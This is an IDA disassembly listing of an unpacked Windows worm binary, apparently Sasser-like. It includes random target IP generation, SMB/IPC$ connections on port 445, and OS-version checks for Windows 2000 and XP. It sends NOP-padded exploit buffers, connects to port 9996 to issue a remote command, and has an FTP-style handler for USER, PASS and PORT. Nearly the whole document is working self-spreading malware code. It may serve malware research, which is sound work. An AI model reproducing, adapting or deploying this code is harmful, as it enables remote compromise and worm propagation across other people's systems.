;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 59FC5B2B9310636905516255AB1F9392
; File Name : u:\work\59fc5b2b9310636905516255ab1f9392_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00008000 ( 32768.)
; Section size in file : 00008000 ( 32768.)
; Offset to raw data for section: 00001000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; OS type : MS Windows
; Application type: Executable 32bit
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; CODE XREF: sub_40127D+7C�p
; sub_401EF0:loc_401F35�p ...
mov eax, dword_406F30
imul eax, 343FDh
add eax, 279EC3h
mov dword_406F30, eax
shr eax, 10h
and eax, 7FFFh
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_40101E proc near ; CODE XREF: WinMain(x,x,x,x)+1F�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_406F30, eax
retn
sub_40101E endp
; =============== S U B R O U T I N E =======================================
sub_401028 proc near ; CODE XREF: WinMain(x,x,x,x)+24�p
var_190 = byte ptr -190h
sub esp, 190h
lea eax, [esp+190h+var_190]
push eax
push 101h
call dword_405114
add esp, 190h
retn
sub_401028 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401045 proc near ; CODE XREF: sub_4010D2+4C�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
push edi
push [ebp+arg_0]
call dword_40510C
movsx ecx, al
mov [ebp+arg_0], eax
movsx edx, byte ptr [ebp+arg_0+2]
movsx esi, byte ptr [ebp+arg_0+3]
movsx edi, ah
test ecx, ecx
mov eax, 100h
jge short loc_40106F
add ecx, eax
loc_40106F: ; CODE XREF: sub_401045+26�j
test edi, edi
jge short loc_401075
add edi, eax
loc_401075: ; CODE XREF: sub_401045+2C�j
test edx, edx
jge short loc_40107B
add edx, eax
loc_40107B: ; CODE XREF: sub_401045+32�j
test esi, esi
jge short loc_401081
add esi, eax
loc_401081: ; CODE XREF: sub_401045+38�j
push 1
cmp ecx, 7Fh
pop eax
jnz short loc_401095
test edi, edi
jnz short loc_4010CE
test edx, edx
jnz short loc_4010CE
cmp esi, eax
jz short loc_4010CC
loc_401095: ; CODE XREF: sub_401045+42�j
cmp ecx, 0Ah
jz short loc_4010CC
cmp ecx, 0ACh
jnz short loc_4010AC
cmp edi, 0Fh
jle short loc_4010CE
cmp edi, 20h
jl short loc_4010CC
loc_4010AC: ; CODE XREF: sub_401045+5B�j
cmp ecx, 0C0h
jnz short loc_4010BC
cmp edi, 0A8h
jz short loc_4010CC
loc_4010BC: ; CODE XREF: sub_401045+6D�j
cmp ecx, 0A9h
jnz short loc_4010CE
cmp edi, 0FEh
jnz short loc_4010CE
loc_4010CC: ; CODE XREF: sub_401045+4E�j
; sub_401045+53�j ...
xor al, al
loc_4010CE: ; CODE XREF: sub_401045+46�j
; sub_401045+4A�j ...
pop edi
pop esi
pop ebp
retn
sub_401045 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010D2 proc near ; CODE XREF: sub_40127D+9C�p
; sub_401EF0+1A�p
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push ebx
push esi
push edi
lea eax, [ebp+var_100]
push 0FFh
push eax
call dword_405104
test eax, eax
jnz short loc_401136
lea eax, [ebp+var_100]
push eax
call dword_405110
mov edi, eax
xor esi, esi
cmp edi, esi
jz short loc_401136
mov eax, [edi+0Ch]
cmp [eax], esi
jz short loc_401136
loc_401110: ; CODE XREF: sub_4010D2+60�j
mov eax, [esi+eax]
push dword ptr [eax]
call dword_405108
mov ebx, eax
push ebx
call sub_401045
test al, al
pop ecx
jnz short loc_40113D
mov eax, [edi+0Ch]
add esi, 4
cmp dword ptr [esi+eax], 0
jnz short loc_401110
jmp short loc_401139
; ---------------------------------------------------------------------------
loc_401136: ; CODE XREF: sub_4010D2+20�j
; sub_4010D2+35�j ...
mov ebx, [ebp+arg_0]
loc_401139: ; CODE XREF: sub_4010D2+62�j
test ebx, ebx
jz short loc_401140
loc_40113D: ; CODE XREF: sub_4010D2+54�j
push ebx
jmp short loc_401145
; ---------------------------------------------------------------------------
loc_401140: ; CODE XREF: sub_4010D2+69�j
push offset a127_0_0_1 ; "127.0.0.1"
loc_401145: ; CODE XREF: sub_4010D2+6C�j
push [ebp+arg_0]
call dword_405018 ; lstrcpyA
pop edi
pop esi
pop ebx
leave
retn
sub_4010D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401153 proc near ; CODE XREF: sub_401EF0+E2�p
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push 10h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push 1BDh
call dword_4050F4
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_4011D5
mov [ebp+var_C], eax
push 8 ; Size
lea eax, [ebp+var_8]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 10h
push 6
push 1
pop ebx
push ebx
push 2
call dword_4050F8
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_4011B4
xor al, al
jmp short loc_4011D1
; ---------------------------------------------------------------------------
loc_4011B4: ; CODE XREF: sub_401153+5B�j
lea eax, [ebp+Dst]
push 10h
push eax
push esi
call dword_4050FC
cmp eax, 0FFFFFFFFh
jnz short loc_4011C8
xor bl, bl
loc_4011C8: ; CODE XREF: sub_401153+71�j
push esi
call dword_40511C
mov al, bl
loc_4011D1: ; CODE XREF: sub_401153+5F�j
pop esi
pop ebx
leave
retn
sub_401153 endp
; =============== S U B R O U T I N E =======================================
sub_4011D5 proc near ; CODE XREF: sub_401153+30�p
; sub_40127D+34�p ...
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
push edi
call dword_40510C
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4011F2
test esi, esi
jnz short loc_401204
cmp byte ptr [edi], 30h
jz short loc_40120B
loc_4011F2: ; CODE XREF: sub_4011D5+12�j
push edi
call dword_405110
test eax, eax
jz short loc_401204
mov eax, [eax+0Ch]
mov eax, [eax]
mov esi, [eax]
loc_401204: ; CODE XREF: sub_4011D5+16�j
; sub_4011D5+26�j
cmp esi, 0FFFFFFFFh
jnz short loc_40120B
xor esi, esi
loc_40120B: ; CODE XREF: sub_4011D5+1B�j
; sub_4011D5+32�j
mov eax, esi
pop edi
pop esi
retn
sub_4011D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401210 proc near ; CODE XREF: sub_40127D+F9�p
Str = byte ptr -14h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
inc dword_406F34
push edi
push dword_406F34
lea eax, [ebp+Str]
push offset aI ; "%i"
push eax
call dword_4050E0 ; wsprintfA
add esp, 0Ch
push 0
push offset aCWin2_log ; "c:\\win2.log"
call dword_405024 ; _lcreat
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_40127A
lea eax, [ebp+Str]
push esi
push eax ; Str
call _strlen
mov esi, dword_405020
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push edi
call esi ; _lwrite
push [ebp+arg_0] ; Str
call _strlen
pop ecx
push eax
push [ebp+arg_0]
push edi
call esi ; _lwrite
push edi
call dword_40501C ; _lclose
pop esi
loc_40127A: ; CODE XREF: sub_401210+37�j
pop edi
leave
retn
sub_401210 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40127D proc near ; CODE XREF: sub_401A84+7B�p
var_348 = dword ptr -348h
Str = byte ptr -33Ch
var_110 = byte ptr -110h
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 33Ch
push ebx
push edi
xor ebx, ebx
push 10h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push 270Ch
call dword_4050F4
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_4011D5
mov [ebp+var_C], eax
push 8 ; Size
lea eax, [ebp+var_8]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 10h
push 6
push 1
push 2
call dword_4050F8
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_4012E2
xor al, al
jmp loc_401394
; ---------------------------------------------------------------------------
loc_4012E2: ; CODE XREF: sub_40127D+5C�j
lea eax, [ebp+Dst]
push 10h
push eax
push edi
call dword_4050FC
cmp eax, 0FFFFFFFFh
jz loc_40138B
push esi
call sub_401000
mov esi, eax
lea eax, [ebp+var_110]
push offset Source
push eax
call dword_405018 ; lstrcpyA
lea eax, [ebp+var_110]
push eax
call sub_4010D2
push esi
lea eax, [ebp+var_110]
push esi
push eax
push off_406030
lea eax, [ebp+Str]
push eax
call dword_4050E0 ; wsprintfA
lea eax, [ebp+Str]
xor esi, esi
push eax ; Str
call _strlen
add esp, 1Ch
test eax, eax
jbe short loc_401373
loc_40134F: ; CODE XREF: sub_40127D+F4�j
push ebx
lea eax, [ebp+esi+Str]
push 1
push eax
push edi
call dword_4050F0
lea eax, [ebp+Str]
inc esi
push eax ; Str
call _strlen
cmp esi, eax
pop ecx
jb short loc_40134F
loc_401373: ; CODE XREF: sub_40127D+D0�j
push [ebp+arg_0]
call sub_401210
mov [esp+348h+var_348], 3E8h
call dword_405028 ; Sleep
mov bl, 1
pop esi
loc_40138B: ; CODE XREF: sub_40127D+75�j
push edi
call dword_40511C
mov al, bl
loc_401394: ; CODE XREF: sub_40127D+60�j
pop edi
pop ebx
leave
retn
sub_40127D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401398 proc near ; CODE XREF: sub_401A84+15�p
var_744 = byte ptr -744h
var_714 = byte ptr -714h
Src = byte ptr -104h
var_103 = byte ptr -103h
var_B4 = byte ptr -0B4h
var_B1 = byte ptr -0B1h
var_87 = byte ptr -87h
var_85 = byte ptr -85h
var_84 = byte ptr -84h
Str = byte ptr -3Ch
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
Dst = byte ptr -0Ch
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 744h
push ebx
push esi
push edi
push offset Source
push [ebp+arg_4]
call dword_405018 ; lstrcpyA
push [ebp+arg_0]
lea eax, [ebp+Str]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
call dword_4050E0 ; wsprintfA
add esp, 0Ch
xor edi, edi
xor ecx, ecx
lea eax, [ebp+var_103]
loc_4013D1: ; CODE XREF: sub_401398+49�j
mov dl, [ebp+ecx+Str]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_4013D1
push 60h ; Size
lea eax, [ebp+var_B4]
push offset dword_4063E4 ; Src
push eax ; Dst
call _memcpy
lea eax, [ebp+Str]
push eax ; Str
call _strlen
shl eax, 1
push eax ; Size
lea eax, [ebp+Src]
push eax ; Src
lea eax, [ebp+var_84]
push eax ; Dst
call _memcpy
add esp, 1Ch
lea eax, [ebp+Str]
push 9 ; Size
push (offset aC+3) ; Src
push eax ; Str
call _strlen
pop ecx
lea eax, [ebp+eax*2+var_85]
push eax ; Dst
call _memcpy
lea eax, [ebp+Str]
push eax ; Str
call _strlen
add al, 1Ah
push 1 ; Size
shl al, 1
mov [ebp+var_2], al
lea eax, [ebp+var_2]
push eax ; Src
lea eax, [ebp+var_B1]
push eax ; Dst
call _memcpy
lea eax, [ebp+Str]
push eax ; Str
call _strlen
shl al, 1
add al, 9
push 1 ; Size
mov [ebp+var_1], al
lea eax, [ebp+var_1]
push eax ; Src
lea eax, [ebp+var_87]
push eax ; Dst
call _memcpy
add esp, 2Ch
push [ebp+arg_0]
call dword_405110
mov ebx, eax
cmp ebx, edi
jz loc_401554
push edi
push 1
push 2
loc_401495: ; DATA XREF: .text:off_4065D8�o
call dword_4050F8
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+arg_0], esi
jz loc_401554
push 1BDh
mov [ebp+var_14], 2
call dword_4050F4
mov [ebp+var_12], ax
mov eax, [ebx+0Ch]
push 8 ; Size
push edi ; Val
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_10], eax
lea eax, [ebp+Dst]
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_14]
push 10h
push eax
push esi
call dword_4050FC
cmp eax, 0FFFFFFFFh
jz short loc_401554
mov ebx, dword_4050F0
push edi
push 89h
push offset dword_4061CC
push esi
call ebx
cmp eax, 0FFFFFFFFh
jz short loc_401554
push edi
mov edi, 640h
lea eax, [ebp+var_744]
push edi
push eax
push esi
mov esi, dword_4050EC
call esi
push 0
push 0A8h
push offset dword_406258
push [ebp+arg_0]
call ebx
cmp eax, 0FFFFFFFFh
jz short loc_401554
push 0
lea eax, [ebp+var_744]
push edi
push eax
push [ebp+arg_0]
call esi
push 0
push 0DEh
push offset dword_406304
push [ebp+arg_0]
call ebx
cmp eax, 0FFFFFFFFh
jnz short loc_401558
loc_401554: ; CODE XREF: sub_401398+F2�j
; sub_401398+10B�j ...
xor eax, eax
jmp short loc_401599
; ---------------------------------------------------------------------------
loc_401558: ; CODE XREF: sub_401398+1BA�j
push 0
lea eax, [ebp+var_744]
push edi
push eax
push [ebp+arg_0]
call esi
push 46h
lea esi, [ebp+var_714]
pop edi
loc_401570: ; CODE XREF: sub_401398+1F3�j
movsx eax, byte ptr [esi]
push eax
push [ebp+arg_4]
push offset aSC ; "%s%c"
push [ebp+arg_4]
call dword_4050E0 ; wsprintfA
add esp, 10h
inc esi
inc esi
dec edi
jnz short loc_401570
push [ebp+arg_0]
call dword_40511C
push 1
pop eax
loc_401599: ; CODE XREF: sub_401398+1BE�j
pop edi
pop esi
pop ebx
leave
retn
sub_401398 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40159E proc near ; CODE XREF: sub_401A84+3B�p
; sub_401A84+5E�p ...
var_89C4 = byte ptr -89C4h
var_895C = byte ptr -895Ch
var_68EC = byte ptr -68ECh
var_687C = byte ptr -687Ch
var_5DB8 = byte ptr -5DB8h
var_4814 = byte ptr -4814h
var_4813 = byte ptr -4813h
var_3780 = byte ptr -3780h
var_2CBC = byte ptr -2CBCh
var_2CBB = byte ptr -2CBBh
var_2CB8 = byte ptr -2CB8h
var_24D4 = byte ptr -24D4h
var_24C4 = byte ptr -24C4h
var_21A0 = byte ptr -21A0h
var_219C = byte ptr -219Ch
var_2190 = byte ptr -2190h
var_1F08 = byte ptr -1F08h
var_1E8C = byte ptr -1E8Ch
var_16BC = byte ptr -16BCh
var_1211 = byte ptr -1211h
var_F24 = byte ptr -0F24h
var_E84 = byte ptr -0E84h
var_778 = dword ptr -778h
var_768 = byte ptr -768h
var_754 = byte ptr -754h
Src = byte ptr -114h
var_113 = byte ptr -113h
Dst = byte ptr -0C4h
var_C1 = byte ptr -0C1h
var_97 = byte ptr -97h
var_95 = byte ptr -95h
var_94 = byte ptr -94h
Str = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 89C4h
call __alloca_probe
mov eax, dword_406A34
push [ebp+arg_0]
mov [ebp+var_14], eax
mov eax, dword_406A38
mov [ebp+var_10], eax
lea eax, [ebp+Str]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
call dword_4050E0 ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_113]
loc_4015D8: ; CODE XREF: sub_40159E+4A�j
mov dl, [ebp+ecx+Str]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_4015D8
push ebx
push esi
push edi
push 60h ; Size
lea eax, [ebp+Dst]
push offset dword_4063E4 ; Src
push eax ; Dst
call _memcpy
lea eax, [ebp+Str]
push eax ; Str
call _strlen
shl eax, 1
push eax ; Size
lea eax, [ebp+Src]
push eax ; Src
lea eax, [ebp+var_94]
push eax ; Dst
call _memcpy
add esp, 1Ch
lea eax, [ebp+Str]
push 9 ; Size
push (offset aC+3) ; Src
push eax ; Str
call _strlen
pop ecx
lea eax, [ebp+eax*2+var_95]
push eax ; Dst
call _memcpy
lea eax, [ebp+Str]
push eax ; Str
call _strlen
add al, 1Ah
push 1 ; Size
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax ; Src
lea eax, [ebp+var_C1]
push eax ; Dst
call _memcpy
lea eax, [ebp+Str]
push eax ; Str
call _strlen
shl al, 1
add al, 9
push 1 ; Size
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax ; Src
lea eax, [ebp+var_97]
push eax ; Dst
call _memcpy
add esp, 2Ch
push 270Ch
call dword_4050F4
xor eax, 9999h
push 2 ; Size
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax ; Src
push offset dword_4060E4 ; Dst
call _memcpy
mov ebx, [ebp+arg_4]
add esp, 0Ch
cmp ebx, 1
jz short loc_40171A
cmp ebx, 2
jz short loc_40171A
push 7D0h ; Size
lea eax, [ebp+var_F24]
push 90h ; Val
push eax ; Dst
call _memset
mov esi, offset Str ; "ë"
push esi ; Str
call _strlen
push eax ; Size
lea eax, [ebp+var_E84]
push esi ; Src
push eax ; Dst
call _memcpy
lea eax, [ebp+var_14]
push eax ; Str
call _strlen
push eax ; Size
lea eax, [ebp+var_14]
push eax ; Src
lea eax, [ebp+var_768]
push eax ; Dst
call _memcpy
add esp, 2Ch
imul ebx, 3Ch
mov eax, dword_406810[ebx]
mov [ebp+var_778], eax
jmp loc_4017EE
; ---------------------------------------------------------------------------
loc_40171A: ; CODE XREF: sub_40159E+115�j
; sub_40159E+11A�j
mov edi, 0DACh
lea eax, [ebp+var_2CB8]
push edi ; Size
push 90h ; Val
push eax ; Dst
call _memset
imul ebx, 3Ch
push 4 ; Size
lea eax, [ebp+var_24D4]
lea ebx, dword_406810[ebx]
push ebx ; Src
push eax ; Dst
call _memcpy
mov esi, offset Str ; "ë"
push esi ; Str
call _strlen
push eax ; Size
lea eax, [ebp+var_24C4]
push esi ; Src
push eax ; Dst
call _memcpy
push 4 ; Size
lea eax, [ebp+var_21A0]
push offset dword_406A2C ; Src
push eax ; Dst
call _memcpy
push 4 ; Size
lea eax, [ebp+var_219C]
push ebx ; Src
push eax ; Dst
call _memcpy
add esp, 40h
push esi ; Str
call _strlen
push eax ; Size
lea eax, [ebp+var_2190]
push esi ; Src
push eax ; Dst
call _memcpy
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4813]
loc_4017A6: ; CODE XREF: sub_40159E+21A�j
mov dl, [ebp+ecx+var_2CB8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, edi
jl short loc_4017A6
and [ebp+var_2CBC], 0
and [ebp+var_2CBB], 0
mov esi, 1C52h
lea eax, [ebp+var_89C4]
push esi ; Size
push 31h ; Val
push eax ; Dst
call _memset
push esi ; Size
lea eax, [ebp+var_68EC]
push 31h ; Val
push eax ; Dst
call _memset
add esp, 18h
loc_4017EE: ; CODE XREF: sub_40159E+177�j
push 0
push 1
push 2
call dword_4050F8
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jz loc_401A7D
push 1BDh
mov [ebp+var_24], 2
call dword_4050F4
push [ebp+arg_0]
mov [ebp+var_22], ax
call sub_4011D5
mov [ebp+var_20], eax
xor ebx, ebx
push 8 ; Size
lea eax, [ebp+var_1C]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 10h
lea eax, [ebp+var_24]
push 10h
push eax
push edi
call dword_4050FC
cmp eax, 0FFFFFFFFh
jz loc_401A7D
mov esi, dword_4050F0
push ebx
push 89h
push offset dword_4061CC
push edi
call esi
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push ebx
mov ebx, 640h
lea eax, [ebp+var_754]
push ebx
push eax
push edi
mov edi, dword_4050EC
call edi
push 0
push 0A8h
push offset dword_406258
push [ebp+var_4]
call esi
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi
push 0
push 0DEh
push offset dword_406304
push [ebp+var_4]
call esi
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+Dst]
push eax
push [ebp+var_4]
call esi
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi
push 0
push 68h
push offset dword_406448
push [ebp+var_4]
call esi
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi
push 0
push 0A0h
push offset dword_4064B4
push [ebp+var_4]
call esi
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi
cmp [ebp+arg_4], 1
jz short loc_4019BB
cmp [ebp+arg_4], 2
jz short loc_4019BB
push 7Ch ; Size
lea eax, [ebp+var_1F08]
push offset dword_406558 ; Src
push eax ; Dst
call _memcpy
lea eax, [ebp+var_F24]
push 7D0h ; Size
push eax ; Src
lea eax, [ebp+var_1E8C]
push eax ; Dst
call _memcpy
push 90h ; Size
lea eax, [ebp+var_16BC]
push offset off_4065D8 ; Src
push eax ; Dst
call _memcpy
add esp, 24h
and [ebp+var_1211], 0
lea eax, [ebp+var_1F08]
push 0
push 0CF8h
jmp loc_401A5E
; ---------------------------------------------------------------------------
loc_4019BB: ; CODE XREF: sub_40159E+3B8�j
; sub_40159E+3BE�j
push 68h ; Size
lea eax, [ebp+var_89C4]
push offset dword_40666C ; Src
push eax ; Dst
call _memcpy
lea eax, [ebp+var_4814]
push 1B5Ah ; Size
push eax ; Src
lea eax, [ebp+var_895C]
push eax ; Dst
call _memcpy
push 70h ; Size
lea eax, [ebp+var_68EC]
push offset dword_4066D8 ; Src
push eax ; Dst
call _memcpy
lea eax, [ebp+var_3780]
push 0A5Eh ; Size
push eax ; Src
lea eax, [ebp+var_687C]
push eax ; Dst
call _memcpy
push 84h ; Size
lea eax, [ebp+var_5DB8]
push offset dword_40674C ; Src
push eax ; Dst
call _memcpy
add esp, 3Ch
lea eax, [ebp+var_89C4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call esi
cmp eax, 0FFFFFFFFh
jz short loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi
push 0
push 0FDCh
lea eax, [ebp+var_68EC]
loc_401A5E: ; CODE XREF: sub_40159E+418�j
push eax
push [ebp+var_4]
call esi
cmp eax, 0FFFFFFFFh
jz short loc_401A7D
push 3E8h
call dword_405028 ; Sleep
push [ebp+var_4]
call dword_40511C
loc_401A7D: ; CODE XREF: sub_40159E+264�j
; sub_40159E+2AB�j ...
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_40159E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401A84 proc near ; CODE XREF: WinMain(x,x,x,x)+3A�p
Str = byte ptr -84h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 84h
push esi
mov esi, [ebp+arg_0]
lea eax, [ebp+Str]
push eax
push esi
call sub_401398
pop ecx
cmp eax, 1
pop ecx
jnz short loc_401B05
lea eax, [ebp+Str]
push offset SubStr ; "5.1"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_401AC8
push 0
push esi
call sub_40159E
push 0
jmp short loc_401AF5
; ---------------------------------------------------------------------------
loc_401AC8: ; CODE XREF: sub_401A84+36�j
lea eax, [ebp+Str]
push offset a5_0 ; "5.0"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_401AEB
push 1
push esi
call sub_40159E
push 1
jmp short loc_401AF5
; ---------------------------------------------------------------------------
loc_401AEB: ; CODE XREF: sub_401A84+59�j
push 2
push esi
call sub_40159E
push 2
loc_401AF5: ; CODE XREF: sub_401A84+42�j
; sub_401A84+65�j
push esi
call sub_40159E
add esp, 10h
push esi
call sub_40127D
pop ecx
loc_401B05: ; CODE XREF: sub_401A84+1F�j
pop esi
leave
retn
sub_401A84 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B08 proc near ; DATA XREF: sub_401E65+74�o
var_8E4 = byte ptr -8E4h
Str = byte ptr -4E4h
Source = byte ptr -4E0h
Dest = byte ptr -0E4h
var_60 = byte ptr -60h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
Dst = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
Delim = byte ptr -4
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8E4h
push ebx
mov ebx, [ebp+arg_0]
cmp ebx, 0FFFFFFFFh
jz loc_401E29
push esi
push edi
push 0
push off_4068D0 ; Str
call _strlen
mov esi, dword_4050F0
pop ecx
push eax
push off_4068D0
push ebx
call esi
mov edi, [ebp+arg_0]
jmp short loc_401B46
; ---------------------------------------------------------------------------
loc_401B43: ; CODE XREF: sub_401B08+310�j
mov ebx, [ebp+arg_0]
loc_401B46: ; CODE XREF: sub_401B08+39�j
push 0
lea eax, [ebp+Str]
push 400h
push eax
push ebx
call dword_4050EC
and [ebp+eax+Str], 0
mov [ebp+var_10], eax
lea eax, [ebp+Str]
push offset aUser ; "USER"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_401B97
push 0
push off_4068D4 ; Str
call _strlen
pop ecx
push eax
push off_4068D4
jmp loc_401E11
; ---------------------------------------------------------------------------
loc_401B97: ; CODE XREF: sub_401B08+73�j
lea eax, [ebp+Str]
push offset aPass ; "PASS"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_401BC8
push 0
push off_4068D8 ; Str
call _strlen
pop ecx
push eax
push off_4068D8
jmp loc_401E11
; ---------------------------------------------------------------------------
loc_401BC8: ; CODE XREF: sub_401B08+A4�j
lea eax, [ebp+Str]
push offset aPort ; "PORT"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz loc_401CA4
lea eax, [ebp+Source]
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _strcpy
mov ax, word_406A60
mov word ptr [ebp+Delim], ax
lea eax, [ebp+Delim]
push eax ; Delim
lea eax, [ebp+Dest]
push eax ; Str
call _strtok
add esp, 10h
mov ebx, eax
xor edi, edi
loc_401C17: ; CODE XREF: sub_401B08+159�j
test ebx, ebx
jz short loc_401C4B
cmp edi, 4
jge short loc_401C2E
push ebx
call sub_401E30
pop ecx
mov [ebp+edi*4+var_38], eax
cmp edi, 4
loc_401C2E: ; CODE XREF: sub_401B08+116�j
jnz short loc_401C3A
push ebx
call sub_401E30
pop ecx
mov [ebp+var_18], eax
loc_401C3A: ; CODE XREF: sub_401B08:loc_401C2E�j
cmp edi, 5
jnz short loc_401C4E
push ebx
call sub_401E30
pop ecx
mov [ebp+var_14], eax
jmp short loc_401C4E
; ---------------------------------------------------------------------------
loc_401C4B: ; CODE XREF: sub_401B08+111�j
push 6
pop edi
loc_401C4E: ; CODE XREF: sub_401B08+135�j
; sub_401B08+141�j
lea eax, [ebp+Delim]
push eax ; Delim
push 0 ; Str
call _strtok
inc edi
pop ecx
cmp edi, 6
pop ecx
mov ebx, eax
jl short loc_401C17
push [ebp+var_2C]
mov edi, [ebp+var_18]
lea eax, [ebp+var_60]
push [ebp+var_30]
shl edi, 8
push [ebp+var_34]
add edi, [ebp+var_14]
push [ebp+var_38]
push offset aI_I_I_I ; "%i.%i.%i.%i"
push eax
call dword_4050E0 ; wsprintfA
add esp, 18h
push 0
push off_4068E0 ; Str
call _strlen
pop ecx
push eax
push off_4068E0
jmp loc_401DD7
; ---------------------------------------------------------------------------
loc_401CA4: ; CODE XREF: sub_401B08+D5�j
